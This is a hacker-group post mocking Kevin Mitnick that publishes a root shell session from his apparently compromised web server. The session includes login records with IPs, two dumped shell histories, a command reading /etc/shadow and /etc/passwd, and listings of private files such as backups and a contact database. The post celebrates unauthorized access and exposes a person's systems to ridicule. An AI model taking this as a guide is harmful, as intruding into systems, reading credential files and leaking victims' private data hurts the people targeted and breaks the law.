Kevin Mitnick

   Kevin Mitnick - Freedom Owntime       .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
    I got a list of demands                                         |
      written on the palm of my hands


Kevin Mitnick, hero to many, wet dream to Emmanuel Goldstein. Consider this a
follow-up to the cDc article. Kevin has become the media rep for the hacker
community, something which he has grown further and further apart from ever
since his release. Without John Markoff's sensationalist reporting Kevin
Mitnick would not have the notoriety that allows him to earn his money
providing keynotes at conferences all over the world. Kevin is polluting the
media with bullshit. Whilst we understand that owning him is something which
has been done many, many times, we felt that not presenting his insecurity
publicly would be wrong. Since 2003 this has been done three times of note
and Kevin has used his enormously powerful SOCIAL ENGINEERING techniques to
escape with an unharmed reputation each time. The fact is that he cannot secure
his systems because he does not know how.

Oh before I forget, we were behind the Mitnick mantraining. It was a beautifully
executed social engineering experiment that worked flawlessly and also provided
us with superb quotes. What can I say, The Art of Deception was some of the
most enthralling 352 pages I have ever read.

I now present you some of his excellent excuses:

"The Web hosting provider that hosts my sites was hacked," Mitnick told CNET
News.com in an interview Monday. "Fortunately, I don't keep any confidential
data on my Web site, so it wasn't that serious. Of course, it is embarrassing
to be defaced--nobody likes it."

Defacing Web sites is akin to graffiti in the brick-and-mortar world. "It is
kind of stupid; they do it for the attention," Mitnick said. "When I was a
hacker, I never stooped to defacing sites because that was more like vandalism;
that wasn't any fun. It is more about getting in and being stealth and looking
around and exploring."

Let me set something straight, Kevin: www.kevinmitnick.com is your
responsibility to secure. You run a security auditing company - what went
wrong?

One thing I notice about the above: Kevin refers to himself as a hacker in the
past tense - heh, at least he doesn't fall for the common fallacy that 'hackers'
are not anything other than people who break into systems.

"They keep getting compromised," he said. "Maybe I'll move it over to Amazon or
something and let them attack Amazon."

That'd be great, Kev, hopefully you'll shift our doors straight over there.

root@www.kevinmitnick.com's password:
Last login: Mon Jul 13 17:08:58 2009 from 58.jerveyave.com


---------------------------------------------------------------------------
This computer system is for authorized users only. All activity is logged and
regularly checked by systems personnel. Individuals using this system without
authority or in excess of their authority are subject to having all their
services revoked. Any illegal services run by user or attempts to take down
this server or it's services will be reported to local law enforcement, and
said user will be punished to the full extent of the law. Anyone using this
system consents to these terms.

---------------------------------------------------------------------------
root@dc21 [~]# w
 11:10:22 up 3 days, 12:54,  0 users,  load average: 0.00, 0.00, 0.00
USER  TTY   FROM      LOGIN@   IDLE   JCPU   PCPU WHAT
root@dc21 [~]# uname -a;id
Linux dc21.hostedhere.net 2.6.18-92.1.18.el5.028stab060.2 #1 SMP Tue Jan 13
11:38:36 MSK 2009 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@dc21 [~]# last
reboot  system boot  2.6.18-92.1.18.e Mon Jul 13 22:15  (3+12:37)  
root  pts/0       58.jerveyave.com Mon Jul 13 17:08 - crash  (05:07)   
root  pts/0       greenville.isopo Mon Jul 13 05:55 - 13:35  (07:39)   
reboot  system boot  2.6.18-92.1.18.e Mon Jul 13 00:15  (4+10:38)  
reboot  system boot  2.6.18-92.1.18.e Sun Jul 12 23:58   (00:09)   
root  pts/0       greenville.isopo Fri Jul 10 04:50 - 11:59  (07:09)   
mitsec  pts/0       72.19.162.209    Thu Jul 9 09:41 - 10:01  (00:20)   
root  pts/0       58.jerveyave.com Wed Jul 8 21:27 - 21:27  (00:00)   
root  pts/0       58.jerveyave.com Tue Jul 7 20:00 - 08:12  (12:11)   
reboot  system boot  2.6.18-92.1.18.e Tue Jul 7 19:46  (5+03:53)  
reboot  system boot  2.6.18-92.1.18.e Tue Jul 7 17:07   (00:13)   
reboot  system boot  2.6.18-92.1.18.e Tue Jul 7 10:59   (05:36)   
root  pts/0       greenville.isopo Tue Jul 7 05:33 - down  (05:17)   
root  pts/0       5ace2de4.bb.sky. Tue Jul 7 05:31 - 05:32  (00:01)   
reboot  system boot  2.6.18-92.1.18.e Tue Jul 7 02:53   (07:57)   
mitsec  pts/0       ip68-229-7-88.lv Thu Jul 2 00:17 - 02:30  (02:13)   
mitsec  pts/0       ip68-229-7-88.lv Wed Jul 1 00:41 - 01:31  (00:50)   
root  pts/3       tech1.xyzdns.net Tue Jun 30 09:33 - 10:01  (00:27)   
root  pts/2       tech1.xyzdns.net Tue Jun 30 09:32 - 10:01  (00:28)   
root  pts/1       tech1.xyzdns.net Tue Jun 30 09:30 - 10:01  (00:30)   
root  pts/0       58.jerveyave.com Mon Jun 29 15:16 - 16:36 (1+01:19)  
mitsec  pts/1       93.sub-75-212-18 Mon Jun 29 12:40 - 14:57  (02:16)   
root  pts/0       58.jerveyave.com Mon Jun 29 05:30 - 15:14  (09:43)   
mitsec  pts/0       110.sub-75-212-1 Mon Jun 29 04:35 - 04:37  (00:02)   
mitsec  pts/1       nmd.sbx03424.las Mon Jun 29 01:47 - 02:14  (00:26)   
mitsec  pts/1       nmd.sbx03424.las Mon Jun 29 01:19 - 01:25  (00:06)   
mitsec  pts/0       c-67-169-204-62. Mon Jun 29 01:19 - 02:46  (01:27)   
mitsec  pts/1       c-67-169-204-62. Mon Jun 29 01:14 - 01:18  (00:04)   
mitsec  pts/0       nmd.sbx03424.las Mon Jun 29 01:08 - 01:15  (00:06)   
mitsec  pts/0       nmd.sbx03424.las Mon Jun 29 00:11 - 00:32  (00:20)   
root  pts/1       tech1.xyzdns.net Tue Jun 23 05:31 - 06:50  (01:18)   
root  pts/1       tech1.xyzdns.net Tue Jun 23 05:28 - 05:30  (00:01)   
root  pts/0       tech1.xyzdns.net Mon Jun 22 17:54 - 16:17  (22:23)   
mitsec  pts/1       nmd.sbx03424.las Sat Jun 20 02:57 - 03:37  (00:40)   
mitsec  pts/1       ip68-229-7-88.lv Fri Jun 19 22:02 - 22:05  (00:03)   
mitsec  pts/1       ip68-229-7-88.lv Fri Jun 19 20:44 - 21:28  (00:44)   
root  pts/0       58.jerveyave.com Thu Jun 18 20:26 - 09:37 (1+13:11)  
mitsec  pts/0       ip68-229-7-88.lv Thu Jun 18 11:09 - 11:40  (00:31)   
mitsec  pts/0       ip68-229-7-88.lv Wed Jun 17 09:53 - 09:53  (00:00)   
mitsec  pts/0       pool-71-106-244- Mon Jun 15 03:08 - 03:10  (00:02)   
mitsec  pts/0       pool-71-106-244- Tue Jun 9 15:44 - 16:10  (00:25)   
root  pts/0       greenville.isopo Tue Jun 9 12:14 - 14:02  (01:47)   
reboot  system boot  2.6.18-92.1.18.e Mon May 18 15:12  (49+05:01) 
mitsec  pts/0       ip72-193-114-177 Fri May 15 01:44 - 01:59  (00:14)   
root  pts/0       greenville.isopo Fri Apr 24 06:58 - 11:09  (04:11)   
reboot  system boot  2.6.18-92.1.18.e Thu Apr 23 20:26  (73+23:47) 
mitsec  pts/1       186.81.109.196   Mon Apr 20 11:00 - 15:50  (04:50)   
root  pts/1       tech1.xyzdns.net Sun Apr 19 11:39 - 14:16  (02:36)   
root  pts/0       58.jerveyave.com Sun Apr 19 09:01 - 18:36 (4+09:34)  
reboot  system boot  2.6.18-92.1.18.e Sun Apr 19 06:55  (4+11:41)  
reboot  system boot  2.6.18-92.1.18.e Sun Apr 19 06:46   (00:04)   
root  pts/1       tech1.xyzdns.net Sat Apr 18 14:07 - 14:35  (00:28)   
root  pts/0       tech1.xyzdns.net Sat Apr 18 08:18 - 01:28  (17:10)   
reboot  system boot  2.6.18-92.1.18.e Sat Apr 18 07:15   (23:30)   
reboot  system boot  2.6.18-92.1.18.e Fri Apr 17 03:51  (1+03:24)  
root  pts/1       58.jerveyave.com Fri Mar 27 18:21 - 21:42 (5+03:20)  
mitsec  pts/2       wsip-70-168-126- Wed Mar 25 21:34 - 23:46  (02:12)   
root  pts/1       58.jerveyave.com Wed Mar 25 20:03 - 03:45 (1+07:41)  
root  pts/4       tech1.xyzdns.net Tue Mar 24 11:09 - 13:21  (02:12)   
root  pts/3       greenville.isopo Tue Mar 24 11:05 - 14:32  (03:27)   
root  pts/2       tech1.xyzdns.net Mon Mar 23 01:22 - 13:59 (1+12:37)  
root  pts/2       tech1.xyzdns.net Sat Mar 21 15:49 - 17:09  (01:19)   
root  pts/1       66-191-205-150.d Sat Mar 21 15:26 - 20:03 (4+04:36)  
root  pts/0       tech3.xyzdns.net Sat Mar 21 14:08 - 16:40  (02:32)   
root  pts/0       66-191-205-150.d Sat Mar 21 08:54 - 13:08  (04:13)   
reboot  system boot  2.6.18-92.1.18.e Sat Mar 21 08:43  (26+19:06) 
reboot  system boot  2.6.9-023stab040 Sat May 26 10:33   (00:22)   

wtmp begins Sat May 26 10:33:49 2007
root@dc21 [~]# cd /root
root@dc21 [~]# ls -la
total 92
drwxr-xr-x 12 root root 4096 Jul 17 10:51 .
drwxr-xr-x 22 root root 4096 Jul 13 22:16 ..
drwxr-xr-x  7 root root 4096 Mar 21 10:30 .MirrorSearch
-rwxr-xr-x  1 root root 4659 Jul 13 13:35 .bash_history
-rwxr-xr-x  1 root root   24 Jan  6  2007 .bash_logout
-rwxr-xr-x  1 root root  191 Jan  6  2007 .bash_profile
-rwxr-xr-x  1 root root  413 Mar 21 14:09 .bashrc
drwxr-xr-x  4 root root 4096 Mar 21 10:37 .cpanel
drwxr-xr-x  4 root root 4096 Mar 21 09:26 .cpobjcache
-rwxr-xr-x  1 root root  100 Jan  6  2007 .cshrc
drwxr-xr-x  2 root root 4096 Mar 21 09:28 .gnupg
-rw-------  1 root root   46 Jul  6 19:27 .my.cnf
-rwxr-xr-x  1 root root  264 Jul 15 00:27 .pearrc
-rwxr-xr-x  1 root root 1024 Mar 21 10:37 .rnd
drwxr-xr-x  3 root root 4096 Mar 21 10:36 .spamassassin
-rwxr-xr-x  1 root root  129 Jan  6  2007 .tcshrc
drwxr-xr-x  4 root root 4096 Mar 21 14:21 cpanel3-skel
drwxr-xr-x  2 root root 4096 Mar 21 10:22 public_ftp
drwxr-xr-x  3 root root 4096 Mar 21 10:22 public_html
-rwxr-xr-x  1 root root 2171 Dec 12  2008 pure-ftpd
drwxr-xr-x  2 root root 4096 Mar 21 14:09 security
drwxr-xr-x  3 root root 4096 Mar 21 15:51 tmp
root@dc21 [~]# cat .bash_history
passwd
w
w.
w
cd /home
wget
http://layer1.cpanel.net/latest
 sh latest
/scripts/upcp
w
cd /
ls
mv hypervm-scheduled-2.0-vps9.vm-2009-Mar-21-1237645742.tgz
3-21-mitsec-os-image.tgz
ls -l
ls
cd home
ls
wget
http://dc21.hostedhere.net/mitsec.tar.gzw
w
ls
cd /home/
ls
/scripts/restorepkg mitsec.tar.gz
mkdir /root/security;cd /root/security
wget
http://72.3.144.149/software/psm.tar;tar -xvf psm.tar;rm -f psm.tar;./psm
1;rm -f psm.txt;rm -f psm
ls -l
chkrootkit
/usr/local/bin/rkhunter --update
rkhunter -sk -c
/sbin/service apf restart
/sbin/ifconfig
vi /etc/apf/conf.apf
/sbin/service apf restart
cd /root
/scripts/fixdc
/scripts/fixndc
vi /etc/cpupdate.conf
vi /etc/hosts
cd /scripts/
./restartsrv named
./restartsrv http
./upcp --force
./fixcommonproblems
./reinstallmailman
cd /root
hostname -i
vi /usr/local/sim/conf.sim
cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.357
vi /etc/ssh/sshd_config
vi /etc/apf/conf.apf
vi /etc/apf/conf.apf
/sbin/service sshd restart
/etc/apf/apf -r
cd /root
vi /usr/local/lib/php.ini
vi /usr/local/php4/lib/php.ini
/scripts/restartsrv httpd
vi /etc/apf/conf.apf
apf -r
/sbin/service pure-ftpd stop
mv /etc/rc.d/init.d/pure-ftpd /root/
echo > /etc/rc.d/init.d/pure-ftpd
chattr +i /etc/rc.d/init.d/pure-ftpd
vi /etc/pam.d/crond
service crond restart
passwd mitsec
cd /var/log/
ls
tail secure
w
w
pico /etc/httpd/conf/httpd.conf
whereis php.ini
pico /usr/lib/php.ini
service httpd restart
pico /etc/httpd/conf/httpd.conf
pico /usr/local/apache/conf/php.conf
cd /etc/httpd/conf/
ls
pico php.conf
php -i | grep php.ini
pico /usr/local/lib/php.ini
/scripts/installgd
tail -f /etc/httpd/logs/error_log
service httpd restart
tail -f /etc/httpd/logs/error_log
/scripts/easyapache
cd /home/mitsec/
cd www
pico info.txt
chown mitsec:mitsec info.txt
psaswd mitsec
psaswd mitsec
passwd mitsec
whereis proftpd
la
ls
ls -l
pico index.php
cd /var/log
cat secure
ls
pico rootlogins
ls
pico apf_log
service apf stop
service apf start
pico apf_log
date
pico /etc/apf/conf.apf
service apf restart
pico apf_log
ls
tail secure
w
tail secure
lastlog
cd /home/mitsec/
ls
cd www
ls
cd ..
ls
pico .bash_history
ls
cd /
ls
w
betstat
netstat
w
ls -l
df -h
w
netstat
netstat
netstat
cd /etc/httpd/logs/
ls
tail -f access_log
tail -f error_log
pico /var/log/secure
grep "510" /etc/shadow
grep "510" /etc/passwd
pico /var/log/secure
w
w
cd /var/log/
grep "65.124.165" *
cd /etc/httpd
ls
cd domlogs/
ls
grep "65.124.165" mitnicksecurity.com
pico mitnicksecurity.com
cd mitsec
ls
pico mitnicksecurity.com
cd /home/mitsec/access-logs/
ls
pico mitnicksecurity.com
w
top
vi /usr/local/apache/conf/httpd.conf
vi /usr/local/apache/conf/httpd.conf
cd /usr/local/apache
du -sh
prm
/scripts/restartsrv httpd
top
top
w
history
pico /etc/apf/conf.apf
service apf restart
ping 4.2.2.1
telnet vpn.isopoly.com 25
w
telnet vpn.isopoly.com 25
w
top
w
lastlog
history
exit
w
lastlog
rkhunter -c
w
chkrootkit
ps -aux
cd /var/tmp/
ls -l
cd /tmp
ls -l
rm -Rf r*
cd /usr/local/apache;
ls -l pr
w
top
rkhunter -c
w
vi /usr/local/sim/conf.sim
vi /usr/local/sim/conf.sim
cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.325
vi /etc/ssh/sshd_config
vi /etc/apf/conf.apf
/sbin/service sshd restart
/sbin/service apf restart
w
ifconfig
cd /var/log/
tail secure
pico secure
w
w
tail secure
tail secure
tail secure
tail secure
tail secure
cd /etc/ssh
dir
vi sshd_config
w
cd /home/
ls
cd no
ls
cd ..
ls
cd /var/log/
tail secure
tail -n 100 secure
cd /tmp
ls
cd /var/log/btmp
pico /var/log/btmp
cd /var/log
ls -l btmp
pico /etc/passwd
rkhunter
rkhunter -c
 tail /var/cpanel/accounting.log
 tail /var/cpanel/root.accts
df -h
top
history
cd /home/mitsec/
ls -l
cat .lastlogin
ls
cd www
ls
ls -l |grep "Jul"
ls -l
cd ..
ls
cd ..
ls
ls -l
df -h
cd /home/
ls
ls -l
cd mitsec/
ls
ls -l
cd /home/
ls
cd /
ls
ls -l
df -h
rm -Rf 3-21-mitsec-os-image.tgz
df -h
cd /etc
ls
ls -l
top
w
tail /var/log/secure
tail /var/log/messages
netstat
exit
w
df -h
cd /home/
ls
cd no
ls
ls -l
cd ..
ls
cd mitsec/
ls
ls -l
cd public_
cd public_html/
ls
ls -l
ls -l contact_form.php
pico contact_form.php
df -h
top
w
ls -l
cd /
ls
cd ..
ls -l
cd /
ls
ls -l
w
df -h
top
w
cd /
ls
cd tmp
ls
cd backupfileehwcb2/
ls
ls -l
cd ..
ls
cd /
ls
ls -l
rm tmp.tar
ls -l
df -h
cd /home
ls
cd cpbackuptmp/
ls
cd cpbackup/  <-- I *wonder* what's in his CP dir
ls
ls -l
cd daily/
ls
cd ..
cd weekly/
ls
ls -l
cd ..
ls
cd monthly/
ls
cd ..
cd weekly/
ls -l
cd ..
ls
cd ..
ls
cd ..
ls
cd no
ls
cd sources/
ls
cd modules/
ls
ls -l
cd ..
ls
cd authors/
ls
ls -l
cd ..
ls
ls -l
pico MIRRORED.BY
cd ..
ls
ls -l
cd ..
ls
cd virtfs/
ls
ls -l
cd mitsec/
ls
ls -l
cd home
ls
ls -l
cd mitsec/
ls
cd ..
cd ..
cd ..
ls
cd ..
ls
cd /
ls
w
top
root@dc21 [~]# w
 10:53:46 up 3 days, 12:38,  0 users,  load average: 0.00, 0.00, 0.00
USER  TTY   FROM      LOGIN@   IDLE   JCPU   PCPU WHAT
root@dc21 [~]# cat /etc/shadow /etc/passwd
root@dc21 [~]# cd /home/mitsec/
root@dc21 [~]# ls -la
total 10085472
drwxr-xr-x 22 mitsec mitsec   4096 Jul 16 10:36 .
drwxr-xr-x 12 root   root   4096 Jul 16 10:36 ..
-rwxr-xr-x  1 mitsec mitsec     64 Mar 20  2007 .Xauthority
-rwxr-xr-x  1 mitsec mitsec   2399 Jul  9 10:01 .bash_history
-rwxr-xr-x  1 mitsec mitsec     24 Feb 25  2006 .bash_logout
-rwxr-xr-x  1 mitsec mitsec    191 Feb 25  2006 .bash_profile
-rwxr-xr-x  1 mitsec mitsec    124 Feb 25  2006 .bashrc
-rwxr-xr-x  1 mitsec mitsec   5619 Aug 21  2006 .canna
-rwxr-xr-x  1 mitsec mitsec     17 Jan 30  2006 .contactemail
-rwxr-xr-x  1 mitsec mitsec     10 Jan 30  2006 .contactsavetime
drwxr-xr-x  5 mitsec mitsec   4096 Mar 21 12:58 .cpanel
-rwxr-xr-x  1 mitsec mitsec   1682 Jan 23  2005 .cpanel-ducache
-rwxr-xr-x  1 mitsec mitsec     19 Jul 17 10:46 .dns
-rwxr-xr-x  1 mitsec mitsec    383 Aug 21  2006 .emacs
drwxr-xr-x  5 mitsec mitsec   4096 Sep  1  2008 .fantasticodata
-rwxr-xr-x  1 mitsec mitsec     16 Jul  2 23:11 .ftpquota
drwxr-xr-x  2 mitsec mitsec   4096 Sep  1  2008 .gnupg
drwxr-xr-x 52 mitsec nobody   4096 Sep  1  2008 .htpasswds
-rwxr-xr-x  1 mitsec mitsec      7 Sep  2  2008 .lang
-rw-------  1 mitsec mitsec     14 Jul 16 10:22 .lastlogin
-rwxr-xr-x  1 mitsec mitsec     35 Jan 13  2009 .lesshst
-rwxr-xr-x  1 mitsec mitsec    6441532 May  6  2006
.pureftpd-upload.445d6ea6.15.1358.7997c79e
drwxr-xr-x  2 mitsec mitsec   4096 Sep  1  2008 .sqmaildata
drwxr-xr-x  2 mitsec mitsec   4096 Sep  1  2008 .ssh
drwxr-xr-x  2 mitsec mitsec   4096 Mar 28  2007 .trash
-rwxr-xr-x  1 mitsec mitsec    705 Feb 28  2008 .viminfo
-rwxr-xr-x  1 mitsec mitsec      5 Mar  5  2006 .whmtheme
-rwxr-xr-x  1 mitsec mitsec    658 Aug 21  2006 .zshrc
-rwxr-xr-x  1 mitsec mitsec    1361309 Mar  7  2008 CDMA WORKSHOP.rar
-rwxr-xr-x  1 mitsec mitsec   73025457 Mar 20  2007 MitnickDemo.wmv
-rwxr-xr-x  1 mitsec mitsec   20152320 Mar  7  2008 SOFTWARE PACK.rar
-rwxr-xr-x  1 mitsec mitsec  49569 Mar  7  2008 UNIBOX.rar
lrwxrwxrwx  1 mitsec mitsec     32 Jul  7 19:34 access-logs ->
/usr/local/apache/domlogs/mitsec
-rwxr-xr-x  1 mitsec mitsec  582461440 Aug  7  2007 archive.tar
-rwxr-xr-x  1 mitsec mitsec 607360 Sep  4  2007 arcot.ppt
-rwxr-xr-x  1 mitsec mitsec   30242339 Jul 25  2007
asterisk-1.0.8-backup-2007-07-25.tar.gz
-rwxr-xr-x  1 mitsec mitsec 2189910925 Oct 25  2007
backup-10.25.2007_23-54-41_mitsec.tar.gz
-rw-------  1 mitsec mitsec 3264566004 Jul 16 10:35
backup-7.16.2009_10-22-58_mitsec.tar.gz
-rw-------  1 mitsec mitsec 3264029970 Jul  8 16:51
backup-7.8.2009_16-39-47_mitsec.tar.gz
-rwxr-xr-x  1 mitsec mitsec  617186883 Aug 19  2007 backup-8.19.2007.tar.gz
-rwxr-xr-x  1 mitsec mitsec  90279 Nov  6  2006 badboys.mp3
-rwxr-xr-x  1 mitsec mitsec    211 May  5  2007 boot.ini
-rwxr-xr-x  1 mitsec mitsec    5305344 Feb  7  2007 circosec-FINAL.ppt
-rwxr-xr-x  1 mitsec mitsec    5299200 Jan  8  2007 circosec.ppt
-rwxr-xr-x  1 mitsec mitsec  99001 Nov 21  2007 clid.tar.gz
-rwxr-xr-x  1 mitsec mitsec  50838 Jun 20 03:10 contact_form.php
drwxr-xr-x  4 mitsec mitsec   4096 Sep  1  2008 cpanel3-skel
-rwxr-xr-x  1 mitsec mitsec      1 Jan 20 22:01 cpbackup-exclude.conf
drwxr-xr-x  2 mitsec mitsec   4096 Mar 18 00:19 cpmove.psql
drwxr-xr-x  3 mitsec mitsec   4096 Sep  1  2008 cpmove.psql.1220367507
drwxr-xr-x  3 mitsec mitsec   4096 Sep  2  2008 cpmove.psql.1237665475
-rwxr-xr-x  1 mitsec mitsec 238515 Aug 19  2007 error_log
-rwxr-xr-x  1 mitsec mitsec   72854668 Aug  3  2008 error_log.txt
drwxr-x--- 14 mitsec mail   4096 Oct 23  2008 etc
-rwxr-xr-x  1 mitsec mitsec  33449 Nov 24  2007 etcasterisk.tar.gz
-rwxr-xr-x  1 mitsec mitsec   74625550 Oct 20  2007 files.zip
-rwxr-xr-x  1 mitsec mitsec   17912486 Apr 18  2007 for-faa.zip
-rwxr-xr-x  1 mitsec mitsec  35938 Apr  6  2007 httpd.conf
-rwxr-xr-x  1 mitsec mitsec  35186 Apr  6  2007 httpd.conf.rpmnew
-rwxr-xr-x  1 mitsec mitsec    1515582 Nov 12  2006 issa.jpg
-rwxr-xr-x  1 mitsec mitsec      0 Aug 29  2006 landesk.ppt
-rwxr-xr-x  1 mitsec mitsec      0 Aug 29  2006 landesk1.ppt
-rwxr-xr-x  1 mitsec mitsec      0 Aug 29  2006 landesk2.ppt
drwxr-xr-x  2 mitsec mitsec   4096 Aug 13  2007 logs
drwxrwx--- 10 mitsec mitsec   4096 Mar 21 14:35 mail
-rwxr-xr-x  1 mitsec mitsec   38559604 Apr 25  2005 mitnickpromo2.mov
-rwxr-xr-x  1 mitsec mitsec   18084536 Apr 18  2007 mitnickpromo2.wmv
-rwxr-xr-x  1 mitsec mitsec 600292 Aug  7  2007
mitsec_mitsecmscontact.csv.zip
-rwxr-xr-x  1 mitsec mitsec 616494 Aug  7  2007
mitsec_mitsecmscontact.sql.zip
-rwxr-xr-x  1 mitsec mitsec 693914 Aug  7  2007
mitsec_mitsecmscontact.xls.zip
-rwxr-xr-x  1 mitsec mitsec   1506 Apr  4  2007 mod_security.conf
drwxr-xr-x  5 mitsec mitsec   4096 Sep  1  2008 moved
-rwxr-xr-x  1 mitsec mitsec   9457 Nov 18  2006 presentations.php
drwxr-xr-x  3 mitsec mitsec   4096 Mar 21 14:34 public_ftp
drwxr-xr-x 24 mitsec nobody   4096 Jul  9 10:01 public_html
-rwxr-xr-x  1 mitsec mitsec  11274 Apr  4  2007 ssl.conf
drwxr-xr-x  2 mitsec mitsec   4096 Jan 30  2008 stuff
drwxr-xr-x  7 mitsec mitsec   4096 Oct 10  2008 tmp
-rwxr-xr-x  1 mitsec mitsec   30189757 Nov 24  2007 varlib.tar.gz
-rwxr-xr-x  1 mitsec mitsec  66023 Jun 19 21:23 websitephp.tar.gz
lrwxrwxrwx  1 mitsec mitsec     11 Jul  7 19:18 www -> public_html
drwxr-xr-x  2 mitsec mitsec   4096 Nov 12  2006 zzhp
-rwxr-xr-x  1 mitsec mitsec  61314 Jun 19 22:03 zzhp.tar.gz
root@dc21 [~]# cat .bash_history
exit
ps aux
ps aux
users
who
cd ../
ls
cd ../
ls
cd bin
ls
cd ../
ls
ls
cd home
ls
cd ../
cd etc
ls
last
vi host.conf
ls
vi shadow
vi passwd
cd /usr
cd local
cd pcanel
cd cpanel
ls
cd bin
ls
./rkhunter
cd ../
ls
cd ../../
cd ../
ls
cd home
ls
cd mitsec/
ls
vi error_log
cat error_log
ls -la
vi .bash_history
vi .bash_history
vi httpd.conf
vi .contactemail
vi .dns
cd logs
ls
cd ../
ls
vi mod_security.conf
cd access-logs
last
cd /var/log
ls
vi messages
vi wtmp
cd ../
cd ../
last -a
last -a
psaux
psaux
p[s aux; exit; q
ps aux
ps aux
cd /scripts
ls
./checkvirtfs
vi checkvirtfs
cd opt
ls
cd ../
cd var
ls
cd ../
ls
last
last -a
netstat -an
netstat
netstat -an
tcp    0   6224 ::ffff:69.65.59.78:3442 ::ffff:67.169.204.62:33145
ESTABLISHED
netstat -an | grep -i estab
mitsec@mitnicksecurity.com [/]# netstat -an | grep -i estab
Active Internet connections (servers and established)
tcp    0 177 69.65.59.78:25  88.102.181.144:2320   
ESTABLISHED
tcp    0   0 69.65.59.78:80  124.125.89.117:55412   
ESTABLISHED
tcp    0   0 69.65.59.78:80  124.125.89.117:55413   
ESTABLISHED
tcp    0   0 69.65.59.78:80  124.125.89.117:55153   
ESTABLISHED
tcp    0   0 69.65.59.78:80  124.125.89.117:55416   
ESTABLISHED
tcp    0   0 69.65.59.78:58434  65.254.36.154:21   
ESTABLISHED
tcp    0  51840 69.65.59.78:38345  65.254.36.154:49565   
ESTABLISHED
tcp    0  52 ::ffff:69.65.59.78:3442 ::ffff:67.169.204.62:33145
ESTABLISHED
Active UNIX domain sockets (servers and established)
mitsec@mitnicksecurity.com [/]#
netstat -an | grep 67.169.204.62
netstat -an
98.99.158.166tcp 0      0 ::ffff:69.65.59.78:3442   
::ffff:98.99.158.166:64118  ESTABLISHED
netstat -an
users
who
netstat -an
netstat -an | grep .248
netstat -an
netstat -an | gep 67.214.58.248
netstat -an | grep 67.214.58.248
netstat
netstat | grep 67.214.58.248
netstat -an
last
last -a
netstat | grep 216.245.214.108
last
exit
cd public_html/
ls -tal | more
exit
ls
cd mail
ls -lta
ls new
cd new
cat *
cd ..
ls
ls -lta
ls -l cur
ls -l mitnicksecurity.com/
ls -latR | more
ls
cd mitnicksecurity.com/
cd kmitnick/
ls
ls cur
cd new
ls
more *
cd ..
cd ..
cd ..
ls
w
last mitsec
exit
ls
cd www/
ls
ls c*
cd
ls
cd public_
cd public_html/
ls
vi contact_form.php
exitroot@dc21 [~]# ls -al
root@dc21 [~]# cd www/; ls -la
total 82928
drwxr-xr-x 24 mitsec nobody 4096 Jul  9 10:01 .
drwxr-xr-x 22 mitsec mitsec 4096 Jul 16 10:36 ..
-rwxr-xr-x  1 mitsec mitsec  629 Feb 26 14:36 .htaccess
-rwxr-xr-x  1 mitsec mitsec   729350 Aug  7  2007 CSC-Testimonial.pdf
-rwxr-xr-x  1 mitsec mitsec  1194067 May 12  2008
FBI_Pretexts_and_Cover_Techniques_May-1956.pdf
-rwxr-xr-x  1 mitsec mitsec  2547699 Aug  7  2007 Mitnick_Playboy_feature.pdf
-rwxr-xr-x  1 mitsec mitsec   687114 Nov 15  2008 PsychologyToday1208.pdf
-rwxr-xr-x  1 mitsec mitsec   117138 Mar  1  2008 US-pretrial.pdf
-rwxr-xr-x  1 mitsec mitsec 1038 Oct 20  2007 _contact_settings.php
-rwxr-xr-x  1 mitsec mitsec  528 Jan 18 16:26 _footer.php
-rwxr-xr-x  1 mitsec mitsec 3133 Aug  7  2007 _header.php
-rwxr-xr-x  1 mitsec mitsec 1380 Mar 28  2005 _news_frontpage.php
-rwxr-xr-x  1 mitsec mitsec    18277 Jun 28 15:20 _sidebar.php
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 alexkasper
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 amc
-rwxr-xr-x  1 mitsec mitsec 37314215 Oct 20  2007 amc.zip
-rwxr-xr-x  1 mitsec mitsec 2798 Aug  7  2007 aoi_reviews.php
drwxr-xr-x  2 mitsec mitsec 4096 Oct 24  2008 blittle
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 cgi-bin
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 cialdini
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 circosec
drwxr-xr-x  2 mitsec mitsec 4096 May 15 01:46 clid
-rwxr-xr-x  1 mitsec mitsec 2870 Aug  7  2007 company.php
-rwxr-xr-x  1 mitsec mitsec 2462 Jan 13  2006 config.php
drwxr-xr-x  4 mitsec mitsec 4096 Sep  1  2008 contact-admin
-rwxr-xr-x  1 mitsec mitsec 2216 Aug  7  2007 contact-old.php
-rwxr-xr-x  1 mitsec mitsec 2174 Mar 19  2007 contact-saved.php
-rwxr-xr-x  1 mitsec mitsec 1662 Aug 26  2007 contact.php
-rwxr-xr-x  1 mitsec mitsec    22744 Nov 16  2006 contact.php.bk
-rwxr-xr-x  1 mitsec mitsec    22519 Nov 13  2006 contact.php.save
-rwxr-xr-x  1 mitsec mitsec 1054 Aug  7  2007 contact_confirmation.php
-rwxr-xr-x  1 mitsec mitsec    50576 Jun 20 03:17 contact_form.matt
-rwxr-xr-x  1 mitsec mitsec    50245 Jun  9 15:45 contact_form.oldform
-rwxr-xr-x  1 mitsec mitsec    50806 Jul  9 09:53 contact_form.php
-rwxr-xr-x  1 mitsec mitsec 1988 Dec  7  2006 contact_new.php.bk
-rwxr-xr-x  1 mitsec mitsec 8021 Nov 16  2006 contact_submit.php.bk
drwxr-xr-x  3 mitsec mitsec 4096 Feb 26 14:36 defthi
drwxr-xr-x  5 mitsec mitsec 4096 Sep  1  2008 dev
drwxr-xr-x  3 mitsec mitsec 4096 Sep  1  2008 elsag
-rwxr-xr-x  1 mitsec mitsec 1613 Jan 13  2006 error.gif
-rwxr-xr-x  1 mitsec mitsec   384144 Aug  7  2007 faa.pdf
-rwxr-xr-x  1 mitsec mitsec 3897 Mar 28  2005 feeds.php
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 flash
-rwxr-xr-x  1 mitsec mitsec 4859 Aug 22  2006 generateimage.php
